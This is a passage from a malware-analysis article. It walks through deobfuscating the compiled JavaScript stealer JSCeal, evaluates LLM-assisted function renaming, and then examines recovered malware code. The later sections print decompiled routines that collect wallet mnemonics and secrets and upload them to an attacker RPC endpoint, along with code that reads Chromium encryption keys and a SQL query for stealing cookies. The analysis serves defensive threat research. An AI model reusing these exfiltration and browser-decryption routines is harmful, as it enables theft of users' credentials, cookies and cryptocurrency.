} // Chunk 0: r15 = r2["Uugef"] if (r15(r11, r12)) { ACCU = 0 continue ///<- this is not the end of the chunk... } r15 = r2["PgJCU"] r17 = r2["LqFvW"] r17 = r17(r11, r12) if (r15(r17, r5)) { ACCU = 1 continue ///<- this is not the end of the chunk... } return -1 break } We have  continue  statements inside the  if  blocks. In the original flow, this leads to jumping back to the top of the loop and fetching another chunk from the list. But when we unflatten the flow, and remove the loop, it no longer makes sense, so this logic has to be rewritten. The chunk should therefore look as follows after this adjustment: // Chunk 0: r15 = r2["Uugef"] if (r15(r11, r12)) { ACCU = 0 } else // added else statement { r15 = r2["PgJCU"] r17 = r2["LqFvW"] r17 = r17(r11, r12) if (r15(r17, r5)) { ACCU = 1 } else // added else statement { return -1 } } The  continue  statements have been removed, and the code that originally followed each  if  statement has been moved into the corresponding  else  clause. The current version of our deobfuscation pass can handle such scenarios. It automatically removes the nested  continue  statements and reconstructs the equivalent logic by building an  else  clause from the code that follows the original  if  statement. This has proved sufficient in the majority of the analyzed cases. However, we may occasionally encounter more complex or ambiguous variants that are not yet resolved. These cases will be addressed in future versions as our toolkit [ 7 ] evolves. Resolving Proxies and Operations Across the code, we often encounter functions that act as proxies for other functions. Their only role is to complicate the flow, misleading readers about the actual function being called and making its arguments harder to parse. The simplest proxies look as follows: the actual function that is about to be called is just passed as one of the arguments. function func_hgFUm_0x17275c6577e9(a0, a1, a2, a3, a4, a5, a6) { r1 = a1 r2 = a2 r3 = a3 r4 = a4 r5 = a5 r6 = a6 return a0(r1, r2, r3, r4, r5, r6) } function func_oWgYF_0x17275c6566c1(a0, a1, a2, a3, a4) { r1 = a1 r2 = a2 r3 = a3 r4 = a4 return a0(r1, r2, r3, r4) } They are usually simple to resolve. First, we reduce each of them to their basic form, which removes the use of the local registers. For example: function func_INBzN_0x16abcdb5cc69(a0, a1, a2, a3) { r1 = a1 r2 = a2 r3 = a3 return a0(r1, r2, r3) return a0(a1, a2, a3) } Then, we replace their calls. After all the calls to the particular proxy are replaced with their basic meaning, the proxy itself can be hidden in the code. Example: -function func_INBzN_0x16abcdb5cc69(a0, a1, a2, a3) -{ return a0(a1, a2, a3) -} @@ -22213,7 +21565,7 @@ function func_J_0x16abcdb59891() } else { ACCU = func_INBzN_0x16abcdb5cc69(func_k_0x16abcdb5a2d9, <this>, null, null) ACCU = func_k_0x16abcdb5a2d9(<this>, null, null) } As with proxy calls, there are plenty of other small functions that should be resolved and hidden. In multiple places in the code we can find operations that are implemented by functions, with obfuscated names. For example: function func_wcmWN_0x35459f2fab89(a0, a1) { return a0 in a1 } function func_eBvDY_0x35459f2fa789(a0, a1) { return (a0 - a1) } function func_wNPyv_0x35459f2fa689(a0, a1) { return (a0 / a1) } function func_oEEDc_0x35459f2faa89(a0, a1) { return a0(a1) } The same operation can also be defined by multiple instances of an identical function (i.e. there are multiple functions implementing simple addition). One of our deobfuscating passes is meant to replace calls to such functions with the actual operations that they represent. However, the functions may not be called directly. So, before we proceed with the substitution, we need to apply all needed simplifications. Iterative propagation of the structures To complicate the flow even more, the variables and functions are often not used directly. They may be first defined as a local dictionary, initialized, then passed further, to be referenced in different parts of the code. In the snippet below, a dictionary is first assigned to the local register  r1 , filled with references to functions, and further assigned to the scope variable ( Scope[846][21] ). r1 = new {"hKCZK": null, "kdujm": null, "siBVG": null, "qQNNx": null, "ECBQT": null, "Bdomb": null} r1["hKCZK"] = func_hKCZK_0x24149a8df611 r1["kdujm"] = func_kdujm_0x24149a8df931 r1["siBVG"] = func_siBVG_0x24149a8dfbe1 r1["qQNNx"] = func_qQNNx_0x24149a8dfe99 r1["ECBQT"] = func_ECBQT_0x24149a8e0151 r1["Bdomb"] = func_Bdomb_0x24149a8e0409 Scope[846][21] = r1 Then, each of these functions is called indirectly, by one of the children of the declarer. Notice that the keys of many of the dictionaries are strings. This is why decrypting strings is such a crucial step in the whole pipeline: without them, we are unable to proceed further. Due to the layered nature of the obfuscator, the pass that propagates such defined structures must be run multiple times at different stages. The arguments to the string deobfuscation functions are also often passed via dictionaries set into a scope. One such example is given below – in this case, the string decoding function is called via register  r5 , and its two arguments are passed via  Scope[846][3] : r10 = Scope[846][21][r5(Scope[846][3]["N"], Scope[846][3]["M"])] Only after filling them in and deobfuscating strings are we able to see the actual key of the next dictionary (in the given case, it is  "qQNNx" ). The next run of the pass allows us to resolve this key to the value it was mapped to by another function (here: it is a reference to the function  func_qQNNx_0x24149a8dfe99 ). r10 = Scope[846][21]["qQNNx"] //func_qQNNx_0x24149a8dfe99 This is not the end of the rabbit-hole. The referenced function may itself use values passed in a similar way. Below we can see that it first fetches some function via  Scope[845][29]  using the key  "PQxQy"  and then calls this function with two arguments. Basically, it is a wrapper. function func_qQNNx_0x24149a8dfe99(a0, a1) { r1 = Scope[845][29]["PQxQy"] return r1(a0, a1) } Once we track upstream what is behind this key, we find a reference to another function: r4 = new {... "PQxQy": null, ...} ... r4["PQxQy"] = func_PQxQy_0x24149a8dd581 ... Scope[845][29] = r4 Finally, after resolving it to a self-contained unit we find that this whole chain leads to the execution of a simple atomic operation: function func_PQxQy_0x24149a8dd581(a0, a1) { return (a0 - a1) } By peeling the layers, one by one, we manage to express such operations with their literal meaning. An example of the complete simplification process is given below. Step 1 (initial decompiled code): function func_value_0x24149a8e3d19(a0) { [...] r10 = Scope[846][21][r5(Scope[846][3]["N"], Scope[846][3]["M"])] r13 = r5(Scope[846][3]["k"], Scope[846][3]["Q"]) r12 = r0[(r13 + "h")] r10 = r10(r12, a0) Step 2 (resolve arguments for the string deobfuscation function  func_me_0x24149a8e4421 ): r10 = Scope[846][21][func_me_0x24149a8e4421(12568, "%]hf")] //"qQNNx" r13 = func_me_0x24149a8e4421(34408, "[Jy3") //"lengt" r12 = r0[(r13 + "h")] r10 = r10(r12, a0) Step 3 (the string revealed the key of another dictionary passed via scope, that resolves to a function): r10 = Scope[846][21]["qQNNx"] // func_qQNNx_0x24149a8dfe99 r12 = r0["length"] r10 = r10(r12, a0) Step 4 (the found function is called in the line below; it resolves to a proxy function): r12 = r0["length"] r10 = func_qQNNx_0x24149a8dfe99(r12, a0) // -> func_PQxQy_0x24149a8dd581 Step 5 (substitute the proxy function with the actual function it calls): r12 = r0["length"] r10 = func_PQxQy_0x24149a8dd581(r12, a0) Step 6 (the call resolves to an atomic operation and can be substituted by such): r12 = r0["length"] r10 = (r12 - a0) The given example is just one of the possible variants in which such a propagation chain may work. It has been presented to give an idea of the underlying complexity. Interpreting the flow Once we have the major obfuscation layers removed, the malware starts revealing its shape. This allows us to pinpoint the most important building blocks of the whole execution flow, and guide next steps. The entry point of the file is the function labeled start. At the very end of it, the functions that will be running the main operations are set up. Example: global_Xr = func_Xr_0x93e23cef8e9 [...] d7e = global_Xr(func_unknown_0x217bb6195779) [...] G7e = {} M7e = global_Xr(func_unknown_0x7b2a97682c9) j7e = require("dns") ACCU = global_n2() r1 = j7e["setServers"] r3 = new [0, 0] r3[0] = "1.1.1.1" r3[1] = "8.8.8.8" ACCU = r1(r3) ACCU = global_Soe(__filename) if (global_Soe(__filename)) { ACCU = global_d7e() ACCU = global_kV(s7e) } else { ACCU = global_M7e() ACCU = global_kV(G7e) } r0 = ACCU return ACCU } This still contains some obfuscation patterns that need to be understood and removed. Proxy functions using scopes The start function sets up several proxy functions that are further referenced via globals. They come in a few different variants, but we will illustrate the most common type. Let’s focus on the fragments of the earlier snippet: global_Xr = func_Xr_0x93e23cef8e9 ... d7e = global_Xr(func_unknown_0x217bb6195779) ... M7e = global_Xr(func_unknown_0x7b2a97682c9) ... if (global_Soe(__filename)) { ACCU = global_d7e() ... } else { ACCU = global_M7e() ... } The  global_Xr  variable points to the following function: function func_Xr_0x93e23cef8e9(a0, a1) { r0 = Scope[0] Scope[8554][3] = a0 Scope[8554][2] = a1 return func_unknown_0x93e23cef9f9 } That function finishes by returning a reference to another function, which makes the second part of the flow. It uses the scope arguments that were previously set up: function func_unknown_0x93e23cef9f9() { if (Scope[8554][3]) { r0 = Scope[8554][3] Scope[8554][3] = 0 Scope[8554][2] = r0(0) } return Scope[8554][2] } The first step in deobfuscating it is recognizing how these functions behave when joined as one unit. It could be represented by the following pseudo-code: function Xr(fn, cached) { return function thunk() { if (fn) { const tmp = fn; fn = 0; cached = tmp(0); } return cached; }; } This is a lazy, one-shot wrapper: on its first invocation it calls the supplied function and caches the result; subsequent calls return the cached value. In the initialization sites shown here, the thunk is used to reach the underlying function, so for analysis we can collapse that indirection and expose the actual target directly. We can observe it referenced similarly to the example below: global_d7e = global_Xr(func_unknown_0x217bb6195779) [...] ACCU = global_d7e() There is now a global thunk wrapping the target function. Once we understand this indirection, in the initialization path shown here we can expose the target directly: ACCU = func_unknown_0x217bb6195779() So, the final dispatcher can be interpreted as: if (global_Soe(__filename)) { ACCU = func_unknown_0x217bb6195779() ACCU = global_kV(s7e) } else { ACCU = func_unknown_0x7b2a97682c9() ACCU = global_kV(G7e) } Finding the vital functions To understand the flow further, we need to see what happens in the function called in each branch. Let’s look at one of them: function func_unknown_0x7b2a97682c9() { r5 = Scope[0] r2 = func_r_0x7b2a9768611 r6 = new {"bALca": null, "rPEMA": null, "PUUhv": null, "zEykL": null} r6["rPEMA"] = func_rPEMA_0x7b2a9768939 r6["PUUhv"] = func_PUUhv_0x7b2a9768a39 r6["zEykL"] = func_zEykL_0x7b2a9768b39 r1 = r6 r4 = 0 r7 = r1["zEykL"] ACCU = r7(P7e) r7 = r1["rPEMA"] ACCU = r7(X7e) r7 = r1["PUUhv"] ACCU = r7(N7e) r7 = r1["rPEMA"] ACCU = r7(R7e) return undefined } Functions like  rPEMA  simply perform calls via a proxy: function func_rPEMA_0x7b2a9768939(a0) { return a0() } So the real meaning is: function func_unknown_0x7b2a97682c9() { r4 = 0 ACCU = global_P7e() ACCU = global_X7e() ACCU = global_N7e() ACCU = global_R7e() return undefined } In the other branch of the statement, it is: function func_unknown_0x217bb6195779() { r4 = 0 ACCU = global_RU() ACCU = global_n7e() ACCU = global_c7e() ACCU = global_Xf() ACCU = global_FE() ACCU = global_x7e() return undefined } Functions such as  P7e  are defined in the start function as globals and resolve to: global_RU = global_Xr(func_unknown_0x217bb618aaf1) global_n7e = global_Xr(func_unknown_0x217bb618e1f1) global_c7e = global_Xr(func_unknown_0x217bb61943c1) global_Xf = global_Xr(func_unknown_0x1cab5d7b26e9) global_FE = global_Xr(func_unknown_0x1d8d5671d7f1) global_x7e = func_x7e_0x217bb6194f91 global_P7e = global_Xr(func_unknown_0x7b2a9764cb1) global_X7e = global_Xr(func_unknown_0x7b2a9766509) global_N7e = global_Xr(func_unknown_0x7b2a975fa61) global_R7e = global_Xr(func_unknown_0x7b2a9751711) Those are the functions that implement the actual malware functionality. Some of them are further obfuscated, for example: function func_unknown_0x217bb618e1f1() { r3 = Scope[0] r4 = new {"Vhzac": null, "ZljYv": null, "MbImZ": null} r4["Vhzac"] = func_Vhzac_0x217bb618e6d1 r4["ZljYv"] = func_ZljYv_0x217bb618e7d1 r4["MbImZ"] = func_MbImZ_0x217bb618e8d1 r1 = r4 r4 = r1["Vhzac"] ACCU = r4(f1) r4 = r1["ZljYv"] r7 = r1["Vhzac"] r7 = r7(Qs) global_eb = r4(Di, r7) r4 = r1["MbImZ"] ACCU = r4(ag) return undefined } After replacing the wrappers, we can see more clearly what the above code represents: function func_unknown_0x217bb618e1f1() { r3 = Scope[0] ACCU = global_f1() // global_f1 = global_Xr(func_unknown_0x23f664e8d2b1) r7 = global_Qs() // global_Qs = global_du(func_unknown_0x1cab5d7a90b1) global_eb = global_Di(r7) // global_Di = func_Di_0x93e23cf17b1 ACCU = global_ag() // global_ag = global_Xr(func_unknown_0x1cab5d7b0399) return undefined } Further substituting the globals with their literal values and removing all the proxy layers finally reveals the bare dispatcher functions that can be easily followed and analyzed. After the final transformation, the function presented above takes the following form: function func_unknown_0x217bb618e1f1() { ACCU = func_unknown_0x23f664e8d2b1() r7 = func_unknown_0x1cab5d7a90b1["exports"]() global_eb = func_Di_0x93e23cf17b1(r7) ACCU = func_unknown_0x1cab5d7b0399() return undefined } LLM-assisted function renaming After the deterministic deobfuscation passes, the output is structurally much cleaner: strings are visible, important flattened flows have been reconstructed, and many proxy and operation-wrapper functions have disappeared. One problem remains unavoidable: compilation and obfuscation have destroyed the original semantic function names. For a small program, an analyst could rename important functions manually. JSCeal contains thousands of functions, including a large amount of bundled dependency code, so manual naming does not scale. We therefore added an  optional LLM-assisted renaming stage  as a navigation aid. The distinction is important: the LLM does not perform the core deobfuscation, and its output is not treated as evidence. It receives code that has already been recovered by the static pipeline and proposes labels intended to make the resulting function graph easier to browse. Dependency-aware renaming Because functions depend on other functions, the order in which they are sent to the renamer matters. We start by building a dependency graph from the entry point. In the default mode, the graph follows  direct function calls . In  greedy  mode, it follows all visible function references, including callbacks, handlers, and functions assigned into objects. Greedy mode therefore covers a broader part of the program, but it also produces a much larger graph. Renaming proceeds leaf-first. Functions with the fewest unresolved dependencies are processed first. Each proposed name is then propagated into dependent functions before the next layer is processed. By the time the renamer reaches a high-level function, many of its callees already carry descriptive labels. Conceptually: Figure 4 – The conceptual flow of the function renamer The tool can send functions individually or group them into bulk requests. Generated mappings are stored in CSV, which also acts as a cache: interrupted runs can continue without re-querying functions that have already been covered. Reviewed or externally generated CSV mappings can also be applied without contacting an LLM. The public release supports Anthropic, OpenAI, and Ollama backends. It also provides a focused  --func  mode for requesting a detailed analysis of one selected function, including a proposed name, behavior summary, evidence, and unresolved uncertainty. Evaluating the proposed names Because a plausible-sounding function name may still be incorrect, we evaluated the renaming stage separately from the deterministic deobfuscation. The supporting experiments were conducted by extracting selected, context-rich function trees, starting from the roots responsible for the malware initialization logic, submitting them to the LLM-assisted analysis workflow, and manually verifying the proposed names. For the final comparison, we generated names from the same normalized deobfuscated base using  Claude Sonnet 4.6  and  GPT-5.4-mini . Note that these models are not perfectly matched vendor tiers, but practical model configurations for processing payloads this large that were available at the time. This evaluation should be treated as an example, not as a ranking. The results of one of the experiments are available in the repository of the supplementary materials [ 8 ] ( session1 ). Across more than 21,000 functions, the two models selected exactly the same textual name only  9.3%  of the time. This provided a broad measure of naming agreement, but not of semantic correctness. Different names can describe the same behavior while failing an exact-string comparison. We therefore performed a separate contextual evaluation on  142 selected function trees , each built from a selected root toward its dependencies. Across  142 selected roots : both proposed names were semantically reasonable in  117  cases; only the Sonnet name held up in  22  cases; only the GPT name held up in  3  cases. When we applied a stricter criterion — whether the name was both correct and sufficiently informative about the function’s actual role — Sonnet produced  128/142  useful names, while GPT produced  30/142 . In another  90  cases, the GPT name still identified the correct general area of behavior but was too broad or imprecise to serve as a strong semantic label. A representative example is a function that locates a certificate in the Windows certificate store and removes it. GPT labeled it  findCertificate , capturing part of the implementation but missing the function’s effect. Sonnet proposed  removeCertificate , which better described the behavior. Sonnet was not infallible either. In one case, it proposed  decryptLocalStateFile , while the function actually read and decrypted a DPAPI master-key file from the Windows Protect directory and verified its HMAC. The label sounded plausible because the surrounding code dealt extensively with browser decryption, but the function body did not support that exact interpretation. These examples define the boundary of the method.  The proposed name is a hypothesis. The function body is the evidence. Strings, APIs, file paths, called functions, and data flow remain the basis for every important analytical claim. The LLM stage helps us find and navigate relevant logic faster; it does not replace reverse engineering. Example:  getGlobalAgent The running example from the earlier deobfuscation stages is a good illustration. After string recovery, control-flow unflattening, and proxy/operation cleanup, its behavior is already visible: it normalizes a protocol and returns the appropriate HTTP or HTTPS global agent. The model proposed the name  getGlobalAgent , which is well supported by the body: function getGlobalAgent(url) { const protocol = url.split(":")[0]; if (protocol === "http") { return http.default.globalAgent; } if (protocol === "https") { return https.default.globalAgent; } if (protocol === "ws") { return http.default.globalAgent; } if (protocol === "wss") { return https.default.globalAgent; } throw new Error("Invalid protocol"); } The useful part is not that the model “discovered” the behavior. The static pipeline had already exposed it. The name simply compresses that understanding into a label that can be propagated into higher-level callers. Overview of the deobfuscated code Although all the JSCeal payloads have similarities, their exact functionality may vary. In this part we will do a brief case study based on one selected sample: MD5:  e27ae65977287bdfb7b0e15fd3603f85  (details:  Appendix B ) The deobfuscated result used in this analysis can be found [ here ]. The corresponding function names mapping is available in the data repository [ 8 ]:  names_greedy_bulk_claude-sonnet-4-6.normalized.csv . Details of the campaign delivering this particular payload are given in Microsoft’s article [ 12 ] and Cato article [ 13 ]. Note that a comprehensive analysis of JSCeal’s capabilities is beyond the scope of this article; here we highlight selected functions to demonstrate that the deobfuscated output is sufficient for practical threat analysis. Initialization After cleaning up the whole flow, the start function becomes much smaller. We additionally applied the optional LLM-assisted renaming stage in greedy mode, which makes the recovered function graph easier to navigate. Multiple structures are initialized in the start function. The proposed labels provide useful hints about their roles; the relevant behavior can then be verified by inspecting the recovered function bodies. From the recovered assignments, we can see that a structure prepared locally is then copied into a global variable. For example: global_Nm = {} r3 = new {"default": null, "disableOverrideQR": null, "overrideQR": null} r3["default"] = func_getPm_0x10000bdcb r3["disableOverrideQR"] = func_getRemoveElementFn_0x10000bdcc r3["overrideQR"] = func_getQrLoginInitiator_0x10000bdcd ACCU = func_defineGetterProperties_0x100003170(global_Nm, r3) The initialization of the actual malware logic is always at the end of the start function. Since all the functions are called directly now (not via proxies), and are renamed, we can quickly focus on those that actually initialize the malware functionalities. global_s7e = {} global_G7e = {} ACCU = func_requireCluster_0x10000317e() r1 = (require("dns"))["setServers"] r3 = new [0, 0] r3[0] = "1.1.1.1" r3[1] = "8.8.8.8" ACCU = r1(r3) ACCU = func_setupWorkerPrimary_0x100000001(__filename) if (func_setupWorkerPrimary_0x100000001(__filename)) { ACCU = func_initializeApplication_0x10000c926() ACCU = func_markEsModule_0x10000317b(global_s7e) } else { ACCU = func_initializeModules_0x10000d2fe() ACCU = func_markEsModule_0x10000317b(global_G7e) } r0 = ACCU return ACCU } As we can see above, there are two alternative initialization functions, both leading to the setup of handlers for the core functionality. The decision about which path to follow is made by the function labeled  func_setupWorkerPrimary_0x100000001 , which returns true when the code is running in the primary cluster process and on the main thread. It also configures the primary cluster process to use  "advanced"  serialization. function func_setupWorkerPrimary_0x100000001(a0) { if (!global_uE["default"]["isPrimary"]) || (!(require("worker_threads"))["isMainThread"]) { return false } if ((a0)) { ACCU = Error ACCU = Error("Worker root already configured") } r4 = global_uE["default"] if (r4["isPrimary"]) { r4 = global_uE["default"]["setupPrimary"] r6 = new {"serialization": null} r6["serialization"] = "advanced" ACCU = r4(r6) } return true } Originally, both initialization functions that follow the decision were obfuscated with Control Flow Flattening, and used wrapped calls. Now their meaning is much clearer, and the inner function names give us a better approximation of what to expect. Variant 1 (primary, main thread): function func_initializeApplication_0x10000c926() { r4 = 0 ACCU = func_initializeFaroClient_0x100005504() ACCU = func_initializeMainRouter_0x10000c910() ACCU = func_initLevelDbModule_0x10000a912() ACCU = func_initializeMachineIdModule_0x10000c915() ACCU = func_initializeModules_0x10000c91e() ACCU = func_runMigrations_0x100000ab3() return undefined } Variant 2 (worker path): function func_initializeModules_0x10000d2fe() { r4 = 0 ACCU = func_initializeAsarRouter_0x10000d28b() ACCU = func_initializeScreenCaptureModule_0x10000d2e3() ACCU = func_initSecurityModule_0x10000d2ef() ACCU = func_initializeNotificationModule_0x10000d2f9() return undefined } Comparing the initialization functions across different payloads can quickly give us an approximate idea of what has changed (although the structure is not always directly comparable). Let’s zoom in on one of the functions called from this initializer:  func_initializeMainRouter_0x10000c910 . It sets up a large collection of handlers, and the proposed names give a quick indication of what to expect inside: function func_initializeMainRouter_0x10000c910() { r4 = 0 ACCU = func_initMetaRouter_0x100005537() ACCU = func_initializePowerRouter_0x100005929() ACCU = func_initScreencastRouterModule_0x10000678b() ACCU = func_initKeydownRouterModule_0x10000679f() ACCU = func_initializeTerminalRouter_0x100006e0e() ACCU = func_initializeFileSystemRouter_0x100006efa() ACCU = func_initializeProcessRouter_0x100006f11() ACCU = func_initializeWindowsRouter_0x100007038() ACCU = func_initializeAppRouter_0x100009ef2() ACCU = func_initializeNgcRouter_0x10000a98f() ACCU = func_initializeRouterModule_0x10000a99e() ACCU = func_initializeBrowserRouter_0x10000b83a() ACCU = func_initTelegramModule_0x10000b862() ACCU = func_initializeSslProxyModule_0x10000be35() ACCU = func_initializeRouterModule_0x10000bffa() ACCU = func_initializeServerModule_0x10000c8bb() ACCU = func_initializeNotificationRouter_0x10000c8c2() ACCU = func_initializeApplication_0x10000c8cf() ACCU = func_initializeAutounattendModule_0x10000c8e7() ACCU = func_initRecoveryModule_0x10000c8f3() ACCU = func_initSystemControlModule_0x10000c8fe() r10 = new {"power": null, "screen": null, "keyboard": null, "terminal": null, "filesystem": null, "processes": null, "windows": null, "asar": null, "ngc": null, "checker": null, "chromium": null, "telegram": null, "proxy": null, "reverseProxy": null, "server": null, "toast": null, "machine": null, "unattend": null, "winRE": null, "tools": null} r10["power"] = global_DP r10["screen"] = global_QX r10["keyboard"] = global_RX r10["terminal"] = global_YX r10["filesystem"] = global_iG r10["processes"] = global_oG r10["windows"] = global_aG r10["asar"] = global_oj r10["ngc"] = global_iz r10["checker"] = global_sz r10["chromium"] = global_EK r10["telegram"] = global_pK r10["proxy"] = global_HK r10["reverseProxy"] = global_tU r10["server"] = global_pU r10["toast"] = global_gU r10["machine"] = global_VU r10["unattend"] = global__U r10["winRE"] = global_yU r10["tools"] = global_kU global_RL = (global_Nh["router"])(r10) return undefined } The structure is a tRPC router tree: each  initialize*Router  or  initialize*Module  call builds a set of procedures and assigns them to a global. The same  router  /  procedure  /  query  /  mutation  pattern recurs throughout the payload, including in the security, screen capture, and cryptocurrency modules shown later. For example: function func_initSecurityModule_0x10000d2ef() { Scope[6][6] = func_n_0x10000d2e4 r5 = func_initializeNativeModule_0x1000054f8["exports"]() global_JB = func_interopRequireWildcard_0x10000317a(r5) ACCU = func_requireCluster_0x10000317e() ACCU = func_noop_0x10000a9a0() ACCU = func_initClusterModule_0x10000cdef() r2 = (func_createInstance_0x100000ab5())["router"] r4 = new {"getUserDirectory": null} r6 = (func_createInstance_0x100000ab5())["procedure"] r5 = r6["query"] r4["getUserDirectory"] = r5(func_getUserDirectory_0x10000d2ec) global_OL = r2(r4) ACCU = func_runIfWorkerPool_0x10000000b(("security-impersonation"), func_impersonateUserAndInit_0x10000d2ee) return undefined } // the handler: function func_impersonateUserAndInit_0x10000d2ee(a0) { r1 = global_JB["impersonateUserSecurity"] ACCU = r1(a0) ACCU = func_initWorkerSocket_0x100000abd(global_OL) return undefined } Initialization functions frequently end by registering a worker thread to run the handlers they just built. Here  func_runIfWorkerPool_0x10000000b  binds the  security-impersonation  pool to  func_impersonateUserAndInit_0x10000d2ee , which impersonates a user security context before attaching the router to a worker socket. The remaining modules follow the same shape; below we look at the ones that expose the most capability. Uploading collected data Among the recovered initialization functions are routers that register handlers for collected secrets. Following those handlers downstream shows how the local routes reach the malware’s network client. function func_initializeApplicationsRouter_0x10000c8a5() { Scope[604][4] = func_n_0x10000c89e r3 = 0 ACCU = func_initializeNetworkClient_0x100006702() ACCU = func_initializeDatabase_0x10000c895() ACCU = func_unknown_0x10000590f() r6 = global_fi["object"] r8 = new {"application": null, "value": null} r8["application"] = global_fi["string"]() r8["value"] = global_fi["string"]() global_DL = r6(r8) r9 = new {"secrets": null} r13 = new {"save": null} r17 = (global_DB["procedure"])["input"] r17 = r17(global_DL) r16 = r17["meta"] r18 = new {"openapi": null} r19 = new {"method": null, "path": null} r19["method"] = "POST" r19["path"] = "/applications/secrets/save" r18["openapi"] = r19 r16 = r16(r18) r15 = r16["output"] r17 = global_fi["void"] r17 = r17() r15 = r15(r17) r14 = r15["mutation"] r13["save"] = r14(func_saveApplicationSecretHandler_0x10000c8a4) r9["secrets"] = (global_DB["router"])(r13) global_fU = (global_DB["router"])(r9) return undefined } An analogous route handles collected wallet mnemonic data through  /wallets/mnemonic/save : function func_initializeMnemonicRouter_0x10000c89d() { [...] r11["path"] = "/wallets/mnemonic/save" [...] r5["saveMnemonic"] = r6(func_saveMnemonicHandler_0x10000c89c) // leads to: func_saveMnemonic_0x1000005dc } The handler passes the record type, collected value, mutation callback, and fields used by the common diff/save helper to  global_hl . After computing whether the new value changes the stored state, the helper invokes the corresponding  global_iB  mutation when a save is required. function func_saveMnemonic_0x1000005dc(a0) { r7 = "mnemonic" r9 = global_iB["wallets"]["saveMnemonic"] r9 = r9["mutate"] r11 = new [0] r11[0] = "words" r5 = r2 return global_hl(r7, a0, r9, r11) } The initializer ( func_initializeNetworkClient_0x100006702 )  wires  global_iB  to two actual transports :  the  RequestLink  uses  func_sendBinaryData_0x100006700 , while its  SocketLink  uses  func_connectWebSocket_0x1000066ff . See the original function [ here ]. Following  func_sendBinaryData_0x100006700  shows where the HTTP path leads next: function func_sendBinaryData_0x100006700() { r1 = ... r0 = ... r3 = undefined r4 = func_buildRpcUrl_0x1000004c7("https", ("")) return func_postBinaryData_0x1000004c4(...r3, r4, r1) } There is an analogous function for the WebSocket: function func_connectWebSocket_0x1000066ff() { r1 = func_buildRpcUrl_0x1000004c7("wss") ACCU = func_createWriteStream_0x100005cb8 return func_createWriteStream_0x100005cb8(r1) } The URL builder constructs an RPC endpoint in the form  https://api.<domain>/rpc  or  wss://api.<domain>/rpc , and adds  machineId  and  token  query parameters. function func_buildRpcUrl_0x1000004c7(a0, a1) { ... r7 = (a0 + "://api.") r7 = (r7 + global_CE) r5 = (r7 + "/rpc") r11 = new {"machineId": null, "token": null} r11["machineId"] = global_cE r11["token"] = r1 return func_buildUrlWithParams_0x1000002a6(r5, r11) } The HTTP transport ultimately performs a binary POST: function func_postBinaryData_0x1000004c4(a0, a1, a2) { ... r7 = global__b["post"] r11 = new {"headers": null, "responseType": null, "signal": null} r12 = new {"content-type": null} r12["content-type"] = "application/octet-stream" r11["headers"] = r12 r11["responseType"] = "arraybuffer" r8 = r7(a0["toString"](), a1, r11) r7 = await r8 ... } It submits the supplied binary payload as  application/octet-stream  and expects an  arraybuffer  response. Stealing browser data The browser module is one of the broader components recovered from the payload. Rather than implementing a parser for a single Chrome profile, JSCeal defines a common abstraction for several Chromium-based browsers. In the analyzed sample, the configuration includes Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Avast Secure Browser, Vivaldi, and Cốc Cốc. For each browser, the malware stores the executable name and the expected location of its user-data directory. Some entries also contain browser-specific launch arguments, extension settings, and cryptographic material. A fragment of the configuration is shown below: function func_initializeBrowserConfig_0x10000a9ad(a0) { [...] r6 = new {"browsers": null, "extensions": null} r7 = new {"CHROME_BROWSER": null, "EDGE_BROWSER": null, "BRAVE_BROWSER": null, "OPERA_BROWSER": null, "OPERA_GX_BROWSER": null, "AVAST_BROWSER": null, "VIVALDI_BROWSER": null, "COCCOC_BROWSER": null} r8 = new {"executable": null, "userData": null, "hmacKey": null, "serviceKeys": null, "msi": null} r8["executable"] = "chrome.exe" r9 = r1["join"] r8["userData"] = r9("AppData", "Local", "Google", "Chrome", "User Data") r8["hmacKey"] = func_base64ToBuffer_0x10000a9a9("50jzNthepfnc3yXY80emW0zfZnYA8C32ckoq8YohLSa3iKJQhpEM86kDE2locfPcBYI3MMkd+LpcT9nIhLUFqA==") r9 = new {"v1": null, "v2": null, "v3": null} r9["v1"] = func_base64ToBuffer_0x10000a9a9("sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=") r9["v2"] = func_base64ToBuffer_0x10000a9a9("6Y831/Th+kM9GTBNwiWAQgkOLR1+6nZw1B9zjQhylmA=") r10 = new {"name": null, "value": null} r10["name"] = "Google Chromekey1" r10["value"] = func_base64ToBuffer_0x10000a9a9("zPihzsVmBbhRdVK6Gi0GHAOinpAnT7L89Zukt1w5I5A=") r9["v3"] = r10 r8["serviceKeys"] = r9 [...] You can see the full function [ here ]. The code reads the browser’s  Local State  file and uses its  profile.info_cache  structure to enumerate available profiles. Each profile is then represented by an object exposing separate iterators for the artifacts that can be collected: iterCookies iterLogins iterSessions iterTokens iterHistoryURLs iterBookmarks iterExtensions The  Local State  file also contains information required to decrypt protected browser data. JSCeal retrieves both the traditional encrypted key and the newer App-Bound encrypted key: function func_readEncryptionKeys_0x10000b6e9(a0, a1, a2) { Scope[1593][3] = a1 Scope[1593][2] = a2 r6 = <closure> r7 = <this> r0 = a2 ACCU = func_b_0x10000b6e6 Scope[1593][4] = func_b_0x10000b6e6 try { r7 = Scope[1591][11]["join"] r1 = r7(a0, "Local State") r7 = Scope[1591][9]["readJSON"] r8 = r7(r1) r7 = r0 r7 = await r8 r8 = _GeneratorGetResumeMode(r0) if (!r8 === 0) { ACCU = r7 } r3 = r7["os_crypt"]["encrypted_key"] r4 = r7["os_crypt"]["app_bound_encrypted_key"] r7 = new {"key": null, "appBoundKey": null} r7["key"] = func_decodeBase64Buffer_0x10000b6eb(r3, func_decryptKey_0x10000b6e7) r7["appBoundKey"] = func_decodeBase64Buffer_0x10000b6eb(r4, func_decryptAppBoundKey_0x10000b6e8) r8 = r7 r7 = r0 ACCU = r8 return r8 } catch {} r7 = ACCU ACCU = null ACCU = Scope[1594] r8 = r0 return Scope[1594][2] } Note: the  _GeneratorGetResumeMode  check is V8’s internal mechanism for resuming after an  await ; it can be treated as control-flow bookkeeping. Cookies are read directly from the SQLite database located at: <profile>\Network\Cookies The query retrieves both plaintext and encrypted values, along with the host, path, expiry time,  HttpOnly  flag, and  SameSite  setting: SELECT host_key, path, name, CAST(value AS BLOB) AS plain_value, CAST(encrypted_value AS BLOB) AS encrypted_value, is_httponly, samesite, expires_utc FROM cookies If a plaintext value is not present, the encrypted value is passed to the browser-data decryption routine. The resulting record is normalized into a structure such as: { host: host_key, path: path, name: name, value: decryptedValue, httpOnly: isHttpOnly, sameSite: sameSite, expiresAt: expiryDate } Saved credentials are handled in a similar way. JSCeal opens the  